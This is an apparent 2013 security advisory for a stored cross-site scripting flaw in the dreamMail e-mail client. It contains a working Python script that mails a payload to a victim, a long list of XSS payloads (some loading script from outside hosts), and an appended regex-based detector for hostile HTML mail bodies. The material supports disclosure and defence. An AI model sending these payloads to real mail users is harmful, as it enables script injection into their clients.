
DreamMail e-mail client v4.6.9.2 Stored XSS Vulnerability

Posted on 25 August 2013

<pre>#!/usr/bin/python
'''
Author: loneferret of Offensive Security
Product: dreamMail e-mail client
Version: 4.6.9.2
Vendor Site: http://www.dreammail.eu
Software Download: http://www.dreammail.eu/intl/en/download.html

Tested on: Windows XP SP3 Eng.
Tested on: Windows 7 Pro SP1 Eng.
dreamMail: Using default settings

E-mail client is vulnerable to stored XSS. Either opening or viewing
the e-mail and you get an annoying alert box etc etc etc.

Injection Point: Body

Gave vendor 7 days to reply in order to co-ordinate a release date.

Timeline:
16 Aug 2013: Tentative release date 23 Aug 2013
16 Aug 2013: Vulnerability reported to vendor. Provided complete list of payloads.
19 Aug 2013: Still no response. Sent second e-mail.
22 Aug 2013: Got a reply but not from development guy. He seems MIA according to contact.
             No longer supported due to missing development guy.
23 Aug 2013: Still nothing.
24 Aug 2013: Release
'''

import smtplib

# Single payload placed in the HTML body; the client renders it on open/preview.
payload = '''&lt;IMG SRC='vbscript:msgbox(&quot;XSS&quot;)'&gt;'''

def sendMail(dstemail, frmemail, smtpsrv, username, password):
    # Hand-built RFC 822 message: each header ends in CRLF and a blank line
    # separates the headers from the HTML body.
    msg = &quot;From: hacker@offsec.local \r\n&quot;
    msg += &quot;To: victim@offsec.local \r\n&quot;
    msg += 'Date: Today \r\n'
    msg += &quot;Subject: XSS payload \r\n&quot;
    msg += &quot;Content-type: text/html \r\n\r\n&quot;
    msg += payload + &quot; \r\n&quot;
    server = smtplib.SMTP(smtpsrv)
    server.login(username, password)
    try:
        server.sendmail(frmemail, dstemail, msg)
    except Exception, e:
        print &quot;[-] Failed to send email:&quot;
        print &quot;[*] &quot; + str(e)
    server.quit()

username = &quot;acker@offsec.local&quot;
password = &quot;123456&quot;
dstemail = &quot;victim@offsec.local&quot;
frmemail = &quot;acker@offsec.local&quot;
smtpsrv  = &quot;xxx.xxx.xxx.xxx&quot;

print &quot;[*] Sending Email&quot;
sendMail(dstemail, frmemail, smtpsrv, username, password)

'''
List of XSS types and different syntaxes to which the client is vulnerable.
Each payload will pop a message box, usually with the message &quot;XSS&quot; inside.

Payload-: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}
Payload-: &lt;SCRIPT SRC=http://server/xss.js&gt;&lt;/SCRIPT&gt;
Payload-: &lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
Payload-: &lt;BODY BACKGROUND=&quot;javascript:alert('XSS');&quot;&gt;
Payload-: &lt;BODY ONLOAD=alert('XSS')&gt;
Payload-: &lt;DIV STYLE=&quot;background-image: url(javascript:alert('XSS'))&quot;&gt;
Payload-: &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert('XSS'))&quot;&gt;
Payload-: &lt;DIV STYLE=&quot;width: expression(alert('XSS'));&quot;&gt;
Payload-: &lt;IFRAME SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/IFRAME&gt;
Payload-: &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert('XSS');&quot;&gt;
Payload-: &lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;
Payload-: &lt;IMG SRC=javascript:alert('XSS')&gt;
Payload-: &lt;IMG DYNSRC=&quot;javascript:alert('XSS');&quot;&gt;
Payload-: &lt;IMG LOWSRC=&quot;javascript:alert('XSS');&quot;&gt;
Payload-: 21exp/*&lt;XSS STYLE='noxss:noxss(&quot;*//*&quot;); xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))'&gt;
Payload-: &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert('XSS')&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
Payload-: &lt;IMG SRC='vbscript:msgbox(&quot;XSS&quot;)'&gt;
Payload-: &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;
Payload-: &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert('XSS'))&quot;&gt;
Payload-: &lt;XSS STYLE=&quot;xss:expression(alert('XSS'))&quot;&gt;
Payload-: &lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert('XSS')&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
Payload-: &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert('XSS')&quot;)}&lt;/STYLE&gt;
Payload-: &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert('XSS');&quot;&gt;
Payload-: &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
Payload-: &lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;
Payload-: &lt;TABLE BACKGROUND=&quot;javascript:alert('XSS')&quot;&gt;&lt;/TABLE&gt;
Payload-: &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert('XSS')&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
Payload-: &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert('XSS');&quot;&gt;]]&gt; &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;
Payload-: &lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
Payload-: &lt;HTML&gt;&lt;BODY&gt; &lt;?xml:namespace prefix=&quot;t&quot; ns=&quot;urn:schemas-microsoft-com:time&quot;&gt; &lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt; &lt;t:set attributeName=&quot;innerHTML&quot; to=&quot;XSS&lt;SCRIPT DEFER&gt;alert('XSS')&lt;/SCRIPT&gt;&quot;&gt; &lt;/BODY&gt;&lt;/HTML&gt;
Payload-: &lt;!--[if gte IE 4]&gt; &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; &lt;![endif]--&gt;
Payload-: &lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
Payload-: &lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
Payload-: &lt;IMG SRC=javascript:alert(&quot;XSS&quot;)&gt;
Payload-: &lt;IMG SRC=`javascript:alert(&quot;We says, 'XSS'&quot;)`&gt;
Payload-: &lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
Payload-: &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
Payload-: &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
Payload-: &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
Payload-: &lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Payload-: &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);&lt;/SCRIPT&gt;
Payload-: &lt;STYLE&gt;@import'javasc ipt:alert(&quot;XSS&quot;)';&lt;/STYLE&gt;
Payload-: &lt;IMG SRC=&quot;jav ascript:alert('XSS');&quot;&gt;
Payload-: &lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert('XSS');&quot;&gt;
Payload-: &lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert('XSS');&quot;&gt;
Payload-: &lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert('XSS');&quot;&gt;
Payload-: &lt;IMG SRC=&quot; &amp;#14; javascript:alert('XSS');&quot;&gt;
Payload-: &lt;SCRIPT/XSS SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
Payload-: &lt;SCRIPT SRC=http://server/xss.js
Payload-: &lt;IMG SRC=&quot;javascript:alert('XSS')&quot;
Payload-: &lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
Payload-: &lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
Payload-: &lt;SCRIPT&gt;a=/XSS/ alert(a.source)&lt;/SCRIPT&gt;
Payload-: &lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
Payload-: &lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
Payload-: &lt;SCRIPT a=&quot;blah&quot; '' SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
Payload-: &lt;SCRIPT &quot;a='&gt;'&quot; SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
Payload-: &lt;SCRIPT a=`&gt;` SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
Payload-: &lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
Payload-: &lt;SCRIPT a=&quot;&gt;'&gt;&quot; SRC=&quot;http://server/xss.js&quot;&gt;&lt;/SCRIPT&gt;
'''</pre>
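The payload list above works because the client's HTML renderer honours entity-encoded and whitespace-split URI schemes, CSS expression(), inline event handlers and a UTF-7 charset switch. The following is an added example, not part of the advisory or of DreamMail, of a rule-based check a mail gateway or client could run over an HTML body before rendering it: it undoes those encodings first, then matches the decoded text. The rule names, the SAMPLES dictionary and the double-decode pass are assumptions made for this example.

```python
import html
import re

# Constructed samples (not from the advisory's script): one benign body plus
# fragments in the styles the payload list above uses.
SAMPLES = {
    "benign":   "<p>Hi, <b>meeting</b> at 10 &amp; lunch after &lt;maybe&gt;</p>",
    "tab-uri":  "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "entities": "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)>",
    "css":      "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
    "vbscript": "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
    "onload":   "<BODY ONLOAD=alert('XSS')>",
    "utf7":     "<META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\">",
}

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # expr/*x*/ession -> expression
CTRL = re.compile(r"[\x00-\x20]")              # bytes IE-era engines ignored inside a scheme

# Rule names are assumptions for this example; each pattern runs on the normalized body.
RULES = [
    ("script-tag",     re.compile(r"<script", re.I)),
    ("script-uri",     re.compile(r"(?:javascript|vbscript):", re.I)),
    ("css-expression", re.compile(r"expression\s*\(", re.I)),
    ("event-handler",  re.compile(r"<[^>]*\son[a-z]+\s*=", re.I)),
    ("utf7-charset",   re.compile(r"charset\s*=\s*[\"']?utf-7", re.I)),
    ("data-binding",   re.compile(r"dataformatas\s*=\s*[\"']?html", re.I)),
]

def normalize(body):
    """Undo the encodings the payloads rely on so the rules see plain text."""
    s = body
    for _ in range(2):              # two passes cover one level of double-encoding
        s = html.unescape(s)        # &#x09; -> TAB, &#106;... -> 'j'..., &amp;# -> &#
    return CSS_COMMENT.sub("", s)

def find_active_content(body):
    """Return the names of every rule that fires on the body (empty list if clean).
    Entities are decoded even outside attributes, so escaped text such as
    &lt;script&gt; is flagged too; for a quarantine filter that bias is deliberate."""
    decoded = normalize(body)
    collapsed = CTRL.sub("", decoded)   # jav<TAB>ascript: -> javascript:
    hits = []
    for name, rx in RULES:
        target = collapsed if name == "script-uri" else decoded
        if rx.search(target):
            hits.append(name)
    return hits

def scan_all():
    """Run every sample; only the benign one should come back clean."""
    return {name: find_active_content(body) for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, hits in scan_all().items():
        print("%-9s %s" % (name, ", ".join(hits) or "clean"))
```

A match is a reason to quarantine or render the message as plain text, not proof of exploitation; the real fix is a renderer that never executes script or script-scheme URIs from mail bodies.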
